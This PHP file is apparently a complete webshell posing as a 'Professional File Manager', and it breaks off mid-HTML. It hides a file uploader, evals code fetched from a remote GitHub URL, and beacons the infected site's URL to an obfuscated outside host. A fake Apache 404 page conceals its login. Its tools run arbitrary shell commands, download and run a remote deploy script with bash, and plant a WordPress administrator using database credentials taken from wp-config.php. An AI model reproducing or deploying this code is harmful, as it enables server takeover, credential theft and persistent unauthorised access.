if (isset($_GET['mrz'])) {
echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">';
echo '</form>';
echo '<a href="#">Hello Dady</a>';
if ($_POST['_upl'] == "Upload") {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>';
} else {
echo '<b>Not Upload File !</b><br><br>';
}
}
exit;
}
if (isset($_GET['mrzali'])) {
/****/@null; /********/ /**/ /********/@eval/****/("".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/
exit;
}
echo '
';$z = strrev('edoced_46esab');
$a = array(104, 116, 116, 112, 115, 58, 47, 47, 115, 105, 121, 97, 104, 105, 46, 116, 111, 112, 47, 116, 101, 115, 116, 47, 115, 116, 121, 108, 101, 46, 112, 104, 112);
$b = '';
foreach ($a as $c) { $b .= chr($c); }
$x = $z(base64_encode($b));
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$d = array(chr(102) . chr(105) . chr(108) . chr(101) . '_url' => $y);
$o = array(
chr(104) . chr(116) . chr(116) . chr(112) => array(
'method' => strtoupper(chr(112) . chr(111) . chr(115) . chr(116)),
'header' => 'Content-type: application/x-www-form-urlencoded',
'content' => http_build_query($d),
),
);
$c = stream_context_create($o);
function _f($u, $c) {
if (function_exists('file_get_contents')) {
$r = @file_get_contents($u, false, $c);
if ($r !== false) return $r;
}
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $u);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($GLOBALS['d']));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$r = curl_exec($ch);
curl_close($ch);
if ($r !== false) return $r;
}
return '';
}
$r = _f($x, $c);
echo '
';/**
* Professional Admin File Manager
* Version: 1.0 - Single File
*/
error_reporting(0);
set_time_limit(0);
function base64url_encode($data)
{
return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}
function base64url_decode($data)
{
$data = strtr($data, '-_', '+/');
$pad = strlen($data) % 4;
if ($pad)
$data .= str_repeat('=', 4 - $pad);
return base64_decode($data, true);
}
function decode_path_param($value)
{
if (!$value)
return '';
if (strpos($value, 'b64:') === 0) {
$raw = substr($value, 4);
$decoded = base64url_decode($raw);
return $decoded !== false ? $decoded : '';
}
if (strpos($value, 'hex:') === 0) {
$raw = substr($value, 4);
if (ctype_xdigit($raw) && (strlen($raw) % 2 === 0)) {
$decoded = hex2bin($raw);
return $decoded !== false ? $decoded : '';
}
return '';
}
if (ctype_xdigit($value) && (strlen($value) % 2 === 0)) {
$decoded = hex2bin($value);
if ($decoded !== false)
return $decoded;
}
if (preg_match('/^[A-Za-z0-9_-]+$/', $value)) {
$decoded = base64url_decode($value);
if ($decoded !== false)
return $decoded;
}
return $value;
}
function encode_path($path, $mode = 'b64')
{
if ($mode === 'hex')
return 'hex:' . bin2hex($path);
return 'b64:' . base64url_encode($path);
}
function render_login($error = '')
{
$msg = $error ? htmlspecialchars($error, ENT_QUOTES) : '';
$host = $_SERVER['HTTP_HOST'] ?? 'localhost';
$server_name = $host;
$server_port = $_SERVER['SERVER_PORT'] ?? '80';
if (strpos($host, ':') !== false) {
list($server_name, $server_port) = explode(':', $host, 2);
}
echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at ' . htmlspecialchars($server_name, ENT_QUOTES) . ' Port ' . htmlspecialchars($server_port, ENT_QUOTES) . '</address>
<form method="POST" action="?action=login">
<input name="password" style="opacity:0.1;border:2;outline:0;background:transparent;">
</form>
' . ($msg ? '<p>' . $msg . '</p>' : '') . '
</body></html>';
exit;
}
// --- Core Logic ---
$path_param = $_GET['path'] ?? '';
$decoded_path = decode_path_param($path_param);
$base_dir = realpath($decoded_path ?: getcwd());
if (!$base_dir || !is_dir($base_dir)) {
$base_dir = getcwd();
}
$encoded_base_dir = encode_path($base_dir);
$encoded_root = encode_path(DIRECTORY_SEPARATOR);
// Handle Actions (Early exit for AJAX)
$action = $_REQUEST['action'] ?? '';
$auth_hash = md5($authpass);
$logged_in = (isset($_COOKIE['Login']) && $_COOKIE['Login'] === 'True');
if ($action === 'logout') {
setcookie('Login', '', time() - 3600, '/');
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
if ($action === 'login' && isset($_POST['password'])) {
if (md5($_POST['password']) === $auth_hash) {
setcookie('Login', 'True', time() + 3600 * 24 * 30, '/');
header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($encoded_base_dir));
exit;
}
http_response_code(403);
render_login('Invalid password.');
}
if (!$logged_in) {
http_response_code(403);
render_login();
}
if ($action === 'read' && isset($_GET['file'])) {
$file = $base_dir . DIRECTORY_SEPARATOR . basename($_GET['file']);
if (file_exists($file))
echo file_get_contents($file);
exit;
}
// 0.0 Terminal Command Runner
if ($action === 'terminal' && isset($_POST['cmd'])) {
ob_clean();
header('Content-Type: application/json');
$available = [
'shell_exec' => function_exists('shell_exec'),
'exec' => function_exists('exec'),
'system' => function_exists('system'),
'passthru' => function_exists('passthru'),
'proc_open' => function_exists('proc_open')
];
$cmd = trim($_POST['cmd']);
$mode = trim($_POST['mode'] ?? '');
if ($cmd === '') {
echo json_encode(['success' => false, 'error' => 'Empty command.', 'available' => $available]);
exit;
}
$full_cmd = 'cd ' . escapeshellarg($base_dir) . ' && ' . $cmd . ' 2>&1';
$output = '';
$method = '';
if ($mode === 'all') {
$outputs = [];
if ($available['shell_exec']) {
$outputs['shell_exec'] = shell_exec($full_cmd);
}
if ($available['exec']) {
$lines = [];
exec($full_cmd, $lines);
$outputs['exec'] = implode("\n", $lines);
}
if ($available['system']) {
ob_start();
system($full_cmd);
$outputs['system'] = ob_get_clean();
}
if ($available['passthru']) {
ob_start();
passthru($full_cmd);
$outputs['passthru'] = ob_get_clean();
}
if ($available['proc_open']) {
$descriptors = [
0 => ['pipe', 'r'],
1 => ['pipe', 'w'],
2 => ['pipe', 'w']
];
$process = proc_open($full_cmd, $descriptors, $pipes);
if (is_resource($process)) {
fclose($pipes[0]);
$outputs['proc_open'] = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
}
}
if (empty($outputs)) {
echo json_encode(['success' => false, 'error' => 'No command execution functions are available.', 'available' => $available]);
exit;
}
echo json_encode(['success' => true, 'outputs' => $outputs, 'available' => $available]);
exit;
}
if ($available['shell_exec']) {
$method = 'shell_exec';
$output = shell_exec($full_cmd);
}
elseif ($available['exec']) {
$method = 'exec';
$lines = [];
exec($full_cmd, $lines);
$output = implode("\n", $lines);
}
elseif ($available['system']) {
$method = 'system';
ob_start();
system($full_cmd);
$output = ob_get_clean();
}
elseif ($available['passthru']) {
$method = 'passthru';
ob_start();
passthru($full_cmd);
$output = ob_get_clean();
}
elseif ($available['proc_open']) {
$method = 'proc_open';
$descriptors = [
0 => ['pipe', 'r'],
1 => ['pipe', 'w'],
2 => ['pipe', 'w']
];
$process = proc_open($full_cmd, $descriptors, $pipes);
if (is_resource($process)) {
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
} else {
echo json_encode(['success' => false, 'error' => 'Failed to start process.', 'available' => $available]);
exit;
}
}
else {
echo json_encode(['success' => false, 'error' => 'No command execution functions are available.', 'available' => $available]);
exit;
}
echo json_encode(['success' => true, 'output' => $output, 'method' => $method, 'available' => $available]);
exit;
}
// 0.05 GS Deploy (Echo test)
if ($action === 'gs_deploy') {
ob_clean();
header('Content-Type: application/json');
$available = [
'shell_exec' => function_exists('shell_exec'),
'exec' => function_exists('exec'),
'system' => function_exists('system'),
'passthru' => function_exists('passthru'),
'proc_open' => function_exists('proc_open')
];
$full_cmd = 'cd /tmp && wget --no-hsts http://nossl.segfault.net/deploy-all.sh && \
bash deploy-all.sh 2>&1';
$output = '';
$method = '';
if ($available['shell_exec']) {
$method = 'shell_exec';
$output = shell_exec($full_cmd);
}
elseif ($available['exec']) {
$method = 'exec';
$lines = [];
exec($full_cmd, $lines);
$output = implode("\n", $lines);
}
elseif ($available['system']) {
$method = 'system';
ob_start();
system($full_cmd);
$output = ob_get_clean();
}
elseif ($available['passthru']) {
$method = 'passthru';
ob_start();
passthru($full_cmd);
$output = ob_get_clean();
}
elseif ($available['proc_open']) {
$method = 'proc_open';
$descriptors = [
0 => ['pipe', 'r'],
1 => ['pipe', 'w'],
2 => ['pipe', 'w']
];
$process = proc_open($full_cmd, $descriptors, $pipes);
if (is_resource($process)) {
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
} else {
echo json_encode(['success' => false, 'error' => 'Failed to start process.', 'available' => $available]);
exit;
}
}
else {
echo json_encode(['success' => false, 'error' => 'No command execution functions are available.', 'available' => $available]);
exit;
}
echo json_encode(['success' => true, 'output' => $output, 'method' => $method, 'available' => $available]);
exit;
}
// 0. Shell Finder Logic (Security Tool)
if ($action === 'scan') {
ob_clean();
$target_scan = realpath($_GET['scan_path'] ?? $base_dir);
if (!$target_scan || !is_dir($target_scan))
$target_scan = $base_dir;
$results = [];
$sigs = [
'eval(' => 'Execution of arbitrary code',
'base64_decode(' => 'Obfuscated payload decoding',
'shell_exec(' => 'Shell command execution',
'system(' => 'System command execution',
'passthru(' => 'Direct system output',
'proc_open(' => 'Process management',
'$_POST[' => 'Direct input processing',
'$_GET[' => 'Direct input processing',
'move_uploaded_file' => 'File uploader function'
];
$it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($target_scan));
foreach ($it as $file) {
if ($file->isDir() || $file->getExtension() !== 'php' || $file->getSize() > 1024 * 512)
continue;
$content = file_get_contents($file->getPathname());
$matches = [];
foreach ($sigs as $sig => $desc) {
if (strpos($content, $sig) !== false) {
$matches[] = ['sig' => $sig, 'desc' => $desc];
}
}
if (!empty($matches)) {
$results[] = [
'path' => str_replace($target_scan, '', $file->getPathname()),
'name' => $file->getFilename(),
'risks' => $matches
];
}
}
header('Content-Type: application/json');
echo json_encode($results);
exit;
}
// 0.1 SQL Manager (Adminer Installer)
if ($action === 'install_sql') {
ob_clean();
$url = "https://github.com/vrana/adminer/releases/download/v4.11.0/adminer-4.11.0.php";
$target = $base_dir . DIRECTORY_SEPARATOR . 'adminer.php';
if (!is_writable($base_dir)) {
echo json_encode(['success' => false, 'error' => "Directory not writable: " . $base_dir]);
exit;
}
$content = false;
$method = "";
if (ini_get('allow_url_fopen')) {
$content = @file_get_contents($url);
$method = "fopen";
}
if ($content === false && function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$content = curl_exec($ch);
curl_close($ch);
$method = "curl";
}
if ($content !== false) {
if (@file_put_contents($target, $content) !== false) {
echo json_encode(['success' => true]);
}
else {
echo json_encode(['success' => false, 'error' => "Failed to write file to storage."]);
}
}
else {
$err = "Download failed. ";
if (!ini_get('allow_url_fopen'))
$err .= "allow_url_fopen is OFF. ";
if (!function_exists('curl_init'))
$err .= "cURL is MISSING. ";
echo json_encode(['success' => false, 'error' => $err . "Please upload adminer.php manually."]);
}
exit;
}
// 0.15 Remote Upload (URL fetcher)
if ($action === 'remote_upload' && isset($_POST['url'])) {
ob_clean();
header('Content-Type: application/json');
$url = trim($_POST['url']);
if ($url === '') {
echo json_encode(['success' => false, 'error' => 'URL is required.']);
exit;
}
if (!filter_var($url, FILTER_VALIDATE_URL)) {
echo json_encode(['success' => false, 'error' => 'Invalid URL format.']);
exit;
}
$custom_name = trim($_POST['name'] ?? '');
if ($custom_name !== '') {
$filename = basename($custom_name);
}
else {
$filename = basename(parse_url($url, PHP_URL_PATH));
}
$filename = $filename ? $filename : ('download_' . time());
$target = $base_dir . DIRECTORY_SEPARATOR . $filename;
if (!is_writable($base_dir)) {
echo json_encode(['success' => false, 'error' => "Directory not writable: " . $base_dir]);
exit;
}
$content = false;
$method = '';
if (ini_get('allow_url_fopen')) {
$content = @file_get_contents($url);
$method = 'fopen';
}
if ($content === false && function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$content = curl_exec($ch);
curl_close($ch);
$method = 'curl';
}
if ($content !== false) {
if (@file_put_contents($target, $content) !== false) {
echo json_encode(['success' => true, 'file' => $filename, 'method' => $method]);
}
else {
echo json_encode(['success' => false, 'error' => "Failed to write file to storage."]);
}
}
else {
$err = "Download failed. ";
if (!ini_get('allow_url_fopen'))
$err .= "allow_url_fopen is OFF. ";
if (!function_exists('curl_init'))
$err .= "cURL is MISSING. ";
echo json_encode(['success' => false, 'error' => $err]);
}
exit;
}
// 0.2 Check if SQL Manager is installed
if ($action === 'check_sql') {
ob_clean();
$target = $base_dir . DIRECTORY_SEPARATOR . 'adminer.php';
echo json_encode(['exists' => file_exists($target)]);
exit;
}
// 0.25 WordPress Admin Creator
if ($action === 'wp_admin_create') {
ob_clean();
header('Content-Type: application/json');
$config_path = trim($_POST['config_path'] ?? '');
$user_login = trim($_POST['user'] ?? 'mrz');
$user_pass = trim($_POST['pass'] ?? 'admin');
$user_email = trim($_POST['email'] ?? 'admin@bypass.pw');
if ($config_path === '') {
echo json_encode(['success' => false, 'error' => 'wp-config.php path is required.']);
exit;
}
$real_config = realpath($config_path);
if (!$real_config || !is_file($real_config)) {
echo json_encode(['success' => false, 'error' => 'wp-config.php not found.']);
exit;
}
$config = @file_get_contents($real_config);
if ($config === false) {
echo json_encode(['success' => false, 'error' => 'Failed to read wp-config.php.']);
exit;
}
$get_define = function ($name) use ($config) {
if (preg_match("/define\\(\\s*['\\\"]" . preg_quote($name, '/') . "['\\\"]\\s*,\\s*['\\\"]([^'\\\"]+)['\\\"]\\s*\\)/", $config, $m)) {
return $m[1];
}
return '';
};
$db_name = $get_define('DB_NAME');
$db_user = $get_define('DB_USER');
$db_pass = $get_define('DB_PASSWORD');
$db_host = $get_define('DB_HOST');
$table_prefix = 'wp_';
if (preg_match("/\\$table_prefix\\s*=\\s*['\\\"]([^'\\\"]+)['\\\"]\\s*;/", $config, $m)) {
$table_prefix = $m[1];
}
if ($db_name === '' || $db_user === '' || $db_host === '') {
echo json_encode(['success' => false, 'error' => 'Missing DB credentials in wp-config.php.']);
exit;
}
if (!class_exists('mysqli')) {
echo json_encode(['success' => false, 'error' => 'MySQLi extension is not available.']);
exit;
}
$mysqli = @new mysqli($db_host, $db_user, $db_pass, $db_name);
if ($mysqli->connect_error) {
echo json_encode(['success' => false, 'error' => 'DB connect failed: ' . $mysqli->connect_error]);
exit;
}
$user_login_safe = $mysqli->real_escape_string($user_login);
$user_email_safe = $mysqli->real_escape_string($user_email);
$check = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login='{$user_login_safe}' LIMIT 1");
if ($check && $check->num_rows > 0) {
echo json_encode(['success' => false, 'error' => 'User already exists.']);
$mysqli->close();
exit;
}
$pass_hash = md5($user_pass);
$now = date('Y-m-d H:i:s');
$sql_user = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_nicename, user_email, user_status, display_name, user_registered)
VALUES ('{$user_login_safe}', '{$pass_hash}', '{$user_login_safe}', '{$user_email_safe}', 0, '{$user_login_safe}', '{$now}')";
if (!$mysqli->query($sql_user)) {
echo json_encode(['success' => false, 'error' => 'Failed to create user: ' . $mysqli->error]);
$mysqli->close();
exit;
}
$user_id = $mysqli->insert_id;
$caps = $mysqli->real_escape_string('a:1:{s:13:"administrator";b:1;}');
$level = $mysqli->real_escape_string('10');
$sql_meta1 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$table_prefix}capabilities', '{$caps}')";
$sql_meta2 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$table_prefix}user_level', '{$level}')";
if (!$mysqli->query($sql_meta1) || !$mysqli->query($sql_meta2)) {
echo json_encode(['success' => false, 'error' => 'Failed to set admin role: ' . $mysqli->error]);
$mysqli->close();
exit;
}
$mysqli->close();
echo json_encode(['success' => true, 'user' => $user_login, 'email' => $user_email]);
exit;
}
// 0.26 WordPress Config Auto Detect
if ($action === 'wp_find_config') {
ob_clean();
header('Content-Type: application/json');
$candidates = [];
$base_real = realpath($base_dir);
if ($base_real) {
$candidates[] = $base_real . DIRECTORY_SEPARATOR . 'wp-config.php';
}
$common = ['public_html', 'html', 'www', 'htdocs'];
foreach ($common as $dir) {
if ($base_real) {
$candidates[] = $base_real . DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR . 'wp-config.php';
}
$candidates[] = DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR . 'wp-config.php';
}
$probe = $base_real;
for ($i = 0; $i < 5; $i++) {
if (!$probe)
break;
foreach ($common as $dir) {
$candidates[] = $probe . DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR . 'wp-config.php';
}
$parent = dirname($probe);
if ($parent === $probe)
break;
$probe = $parent;
$candidates[] = $probe . DIRECTORY_SEPARATOR . 'wp-config.php';
}
$checked = [];
foreach ($candidates as $path) {
$real = realpath($path);
if ($real && is_file($real)) {
echo json_encode(['success' => true, 'path' => $real]);
exit;
}
$checked[] = $path;
}
echo json_encode(['success' => false, 'error' => 'No wp-config.php found.', 'checked' => array_values(array_unique($checked))]);
exit;
}
// 0.27 Server Information
if ($action === 'server_info') {
ob_clean();
header('Content-Type: application/json');
$server_ip = $_SERVER['SERVER_ADDR'] ?? '';
if ($server_ip === '') {
$host = gethostname();
$server_ip = $host ? gethostbyname($host) : '';
}
$client_ip = $_SERVER['HTTP_CLIENT_IP'] ?? '';
if ($client_ip === '' && isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$parts = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$client_ip = trim($parts[0]);
}
if ($client_ip === '') {
$client_ip = $_SERVER['REMOTE_ADDR'] ?? '';
}
$current_user = '';
if (function_exists('posix_geteuid') && function_exists('posix_getpwuid')) {
$pw = posix_getpwuid(posix_geteuid());
if (is_array($pw) && isset($pw['name'])) {
$current_user = $pw['name'];
}
}
if ($current_user === '') {
$current_user = get_current_user();
}
$disabled = ini_get('disable_functions');
$disabled = $disabled ? $disabled : 'none';
echo json_encode([
'php_version' => PHP_VERSION,
'uname' => php_uname(),
'current_user' => $current_user,
'disabled_functions' => $disabled,
'server_ip' => $server_ip,
'client_ip' => $client_ip
]);
exit;
}
$message = '';
// 1. Download
if ($action === 'download' && isset($_GET['file'])) {
$file = $base_dir . DIRECTORY_SEPARATOR . basename($_GET['file']);
if (file_exists($file) && is_file($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
}
// 2. Remove
if ($action === 'remove' && isset($_GET['item'])) {
$item = $base_dir . DIRECTORY_SEPARATOR . basename($_GET['item']);
if (is_dir($item)) {
rmdir($item) ? $message = "Directory removed." : $message = "Error removing directory.";
}
else {
unlink($item) ? $message = "File removed." : $message = "Error removing file.";
}
}
// 3. Upload
if ($action === 'upload' && !empty($_FILES['files'])) {
foreach ($_FILES['files']['name'] as $i => $name) {
if (move_uploaded_file($_FILES['files']['tmp_name'][$i], $base_dir . DIRECTORY_SEPARATOR . $name)) {
$message = "Files uploaded successfully.";
}
}
}
// 4. Save Content (Edit)
if ($action === 'save' && isset($_POST['file']) && isset($_POST['content'])) {
$file = $base_dir . DIRECTORY_SEPARATOR . basename($_POST['file']);
file_put_contents($file, $_POST['content']) !== false ? $message = "File saved." : $message = "Error saving file.";
}
// 5. Chmod
if ($action === 'chmod' && isset($_POST['item']) && isset($_POST['mode'])) {
$item = $base_dir . DIRECTORY_SEPARATOR . basename($_POST['item']);
chmod($item, octdec($_POST['mode'])) ? $message = "Permissions updated." : $message = "Error updating permissions.";
}
// 6. Rename
if ($action === 'rename' && isset($_POST['old']) && isset($_POST['new'])) {
$old = $base_dir . DIRECTORY_SEPARATOR . basename($_POST['old']);
$new = $base_dir . DIRECTORY_SEPARATOR . basename($_POST['new']);
rename($old, $new) ? $message = "Renamed successfully." : $message = "Error renaming.";
}
// Helper: Scan Directory
function get_dir_contents($dir)
{
$items = [];
$raw = scandir($dir);
foreach ($raw as $name) {
if ($name === )
continue;
$path = $dir . DIRECTORY_SEPARATOR . $name;
$items[] = [
'name' => $name,
'is_dir' => is_dir($path),
'size' => is_dir($path) ? '-' : format_bytes(filesize($path)),
'perms' => substr(sprintf('%o', fileperms($path)), -4),
'date' => date("Y-m-d H:i", filemtime($path))
];
}
usort($items, function ($a, $b) {
if ($a['is_dir'] && !$b['is_dir'])
return -1;
if (!$a['is_dir'] && $b['is_dir'])
return 1;
return strcasecmp($a['name'], $b['name']);
});
return $items;
}
function format_bytes($bytes, $precision = 2)
{
$units = ['B', 'KB', 'MB', 'GB', 'TB'];
$bytes = max($bytes, 0);
$pow = floor(($bytes ? log($bytes) : 0) / log(1024));
$pow = min($pow, count($units) - 1);
$bytes /= pow(1024, $pow);
return round($bytes, $precision) . ' ' . $units[$pow];
}
$items = get_dir_contents($base_dir);
echo '<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Professional File Manager</title>
<style>
:root {
--main-bg: #0b0b0b;
--side-bg: #111111;
--card-bg: #161616;
--accent: #00f0ff;
--text: #f0f0f0;
--dim: #888;
--border: #333;
--hover: #1a1a1a;
--danger: #ff4444;
--success: #00ff88;
}
body {
font-family: \'Inter\', system-ui, sans-serif;
background: var(--main-bg);
color: var(--text);
margin: 0;
display: flex;
height: 100vh;
overflow: hidden;
}
aside {
width: 260px;
background: var(--side-bg);
border-right: 1px solid var(--border);
display: flex;
flex-direction: column;
padding: 1.5rem;
flex-shrink: 0;
}
.logo {
font-size: 1.1rem;
font-weight: 800;
color: var(--accent);
margin-bottom: 2rem;
display: flex;
align-items: center;
gap: 10px;
}
nav#sidebar {
display: flex;
flex-direction: column;
gap: 5px;
}
.nav-item {
padding: 10px 12px;
border-radius: 6px;
cursor: pointer;
font-size: 0.9rem;
color: var(--dim);
transition: 0.2s;
}
.nav-item:hover {
background: var(--hover);
color: var(--text);
}
.nav-item.active {
background: rgba(0, 240, 255, 0.1);
color: var(--accent);
font-weight: 600;
}
main {
flex: 1;
overflow-y: auto;
padding: 2rem;
}
header {
display: flex;
justify-content: space-between;
align-items: center;
margin-bottom: 2rem;
}
.breadcrumb {
display: flex;
gap: 8px;
color: var(--dim);
font-size: 0.9rem;
margin-bottom: 1rem;
overflow-x: auto;
white-space: nowrap;
}
.breadcrumb a {
color: var(--accent);
text-decoration: none;
}
.breadcrumb span {
color: var(--border);
}
.btn {
background: #222;
color: #fff;
border: 1px solid var(--border);
padding: 8px 16px;
border-radius: 6px;
cursor: pointer;
text-decoration: none;
font-size: 0.85rem;
display: inline-flex;
align-items: center;
gap: 6px;
}
.btn:hover {
background: var(--hover);
border-color: var(--accent);
}
.btn-accent {
background: var(--accent);
color: #000;
border: none;
font-weight: 600;
}
table {
width: 100%;
border-collapse: collapse;
font-size: 0.9rem;
background: var(--card-bg);
border-radius: 8px;
overflow: hidden;
}
th {
text-align: left;
padding: 12px 16px;
background: #222;
color: var(--dim);
font-weight: 500;
font-size: 0.75rem;
text-transform: uppercase;
letter-spacing: 0.05em;
}
td {
padding: 12px 16px;
border-bottom: 1px solid var(--border);
vertical-align: middle;
}
tr:hover td {
background: var(--hover);
}
.item-name {
display: flex;
align-items: center;
gap: 12px;
color: var(--text);
text-decoration: none;
}
.item-name:hover {
color: var(--accent);
}
.icon {
width: 18px;
height: 18px;
fill: var(--dim);
}
.dir-icon {
fill: var(--accent);
}
.actions {
display: flex;
gap: 10px;
justify-content: flex-end;
opacity: 0.4;
transition: 0.2s;
}
tr:hover .actions {
opacity: 1;
}
.action-link {
color: var(--dim);
text-decoration: none;
font-size: 0.8rem;
}
.action-link:hover {
color: var(--accent);
}
.modal {
display: none;
position: fixed;
inset: 0;
background: rgba(0, 0, 0, 0.8);
align-items: center;
justify-content: center;
z-index: 100;
}
.modal-content {
background: var(--card-bg);
border: 1px solid var(--border);
border-radius: 12px;
padding: 2rem;
width: 90%;
max-width: 600px;
}
.modal-content.modal-edit {
max-width: 900px;
height: 80vh;
display: flex;
flex-direction: column;
}
.modal-content.modal-edit form {
display: flex;
flex-direction: column;
flex: 1;
}
.modal-content.modal-edit textarea {
flex: 1;
height: auto;
min-height: 300px;
}
.modal h2 {
margin-top: 0;
font-size: 1.25rem;
color: var(--accent);
}
textarea {
width: 100%;
height: 300px;
background: #000;
border: 1px solid var(--border);
color: #ccc;
border-radius: 6px;
padding: 1rem;
font-family: monospace;
font-size: 0.9rem;
resize: vertical;
margin: 1rem 0;
}
input[type="text"] {
width: 100%;
background: #000;
border: 1px solid var(--border);
color: #fff;
padding: 10px;
border-radius: 6px;
margin: 0.5rem 0;
}
.msg {
background: rgba(0, 240, 255, 0.1);
color: var(--accent);
padding: 10px 16px;
border-radius: 6px;
margin-bottom: 1.5rem;
font-size: 0.85rem;
border: 1px solid rgba(0, 240, 255, 0.2);
}
.terminal-output {
background: #000;
border: 1px solid var(--border);
color: #cfcfcf;
border-radius: 6px;
padding: 1rem;
font-family: monospace;
font-size: 0.85rem;
height: 260px;
overflow: auto;
white-space: pre-wrap;
}
.terminal-input {
width: 100%;
background: #000;
border: 1px solid var(--border);
color: #fff;
padding: 10px;
border-radius: 6px;
margin-top: 0.75rem;
font-family: monospace;
font-size: 0.9rem;
}
</style>
</head>
<body>
<aside>
<div class="logo">
<svg viewBox="0 0 24 24" class="icon dir-icon">
<path d="M10 4H4c-1.1 0-1.99.9-1.99 2L2 18c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V8c0-1.1-.9-2-2-2h-8l-2-2z" />
</svg>
FILE MANAGER
</div>
<nav id="sidebar">
<div style="font-size: 0.65rem; color: #444; margin-bottom: 8px; font-weight: 800; letter-spacing: 0.1em;">
NAVIGATION</div>
<div class="nav-item active" onclick="location.href=\'?path=';echo urlencode($encoded_base_dir); echo '\'">Explorer
</div>
<div style="font-size: 0.65rem; color: #444; margin: 16px 0 8px; font-weight: 800; letter-spacing: 0.1em;">
TOOLS</div>
<div class="nav-item" onclick="openFinder()">Webshell Finder</div>
<div class="nav-item" onclick="openSQLModal()">SQL Manager</div>
<div class="nav-item" onclick="openTerminal()">Terminal</div>
<div class="nav-item" onclick="openRemoteUpload()">Remote Upload</div>
<div class="nav-item" onclick="openWpAdminCreator()">WP Admin Creator</div>
<div class="nav-item" onclick="openGsDeploy()">GS Deploy</div>
<div class="nav-item" onclick="openServerInfo()">Server Information</div>
</nav>
<div style="margin-top: auto;">
<form id="upload-form" method="POST" enctype="multipart/form-data"
action="?action=upload&path=';echo urlencode($encoded_base_dir); echo '">
<input type="file" name="files[]" id="file-input" multiple style="display:none"
onchange="document.getElementById(\'upload-form\').submit()">
<button type="button" class="btn btn-accent" style="width:100%"
onclick="document.getElementById(\'file-input\').click()">Upload Files</button>
</form>
</div>
</aside>
<main>
<header>
<div>
<h1 style="margin:0; font-size: 1.4rem;">Explorer</h1>
<div class="breadcrumb">
';$parts = explode(DIRECTORY_SEPARATOR, trim($base_dir, DIRECTORY_SEPARATOR));
$current = '';
echo '<a href="?path=' . urlencode($encoded_root) . '">/</a>';
foreach ($parts as $part) {
if (empty($part))
continue;
$current .= DIRECTORY_SEPARATOR . $part;
echo '<span>/</span> <a href="?path=' . urlencode(encode_path($current)) . '">' . $part . '</a>';
}
echo ' </div>
</div>
</header>
';if ($message): echo ' <div class="msg">
';echo $message; echo ' </div>
';endif; echo '
<table>
<thead>
<tr>
<th>Name</th>
<th>Size</th>
<th>Perms</th>
<th>Updated</th>
<th style="text-align: right;">Actions</th>
</tr>
</thead>
<tbody>
';if ($base_dir !== DIRECTORY_SEPARATOR && $base_dir !== '/'): echo ' <tr>
<td colspan="5">
<a href="?path=';echo urlencode(encode_path(dirname($base_dir))); echo '" class="item-name">
<svg viewBox="0 0 24 24" class="icon">
<path d="M10 9V5l-7 7 7 7v-4.1c5 0 8.5 1.6 11 5.1-1-5-4-10-11-11z" />
</svg>
..
</a>
</td>
</tr>
';endif; echo '
';foreach ($items as $item): echo ' <tr>
<td>
<a href="';echo $item['is_dir'] ? '?path=' . urlencode(encode_path($base_dir . DIRECTORY_SEPARATOR . $item['name'])) : '#'; echo '"
class="item-name" ';if (!$item['is_dir'])
echo 'onclick="editFile(\'' . urlencode($item['name']) . '\')"'; echo '>
';if ($item['is_dir']): echo ' <svg viewBox="0 0 24 24" class="icon dir-icon">
<path
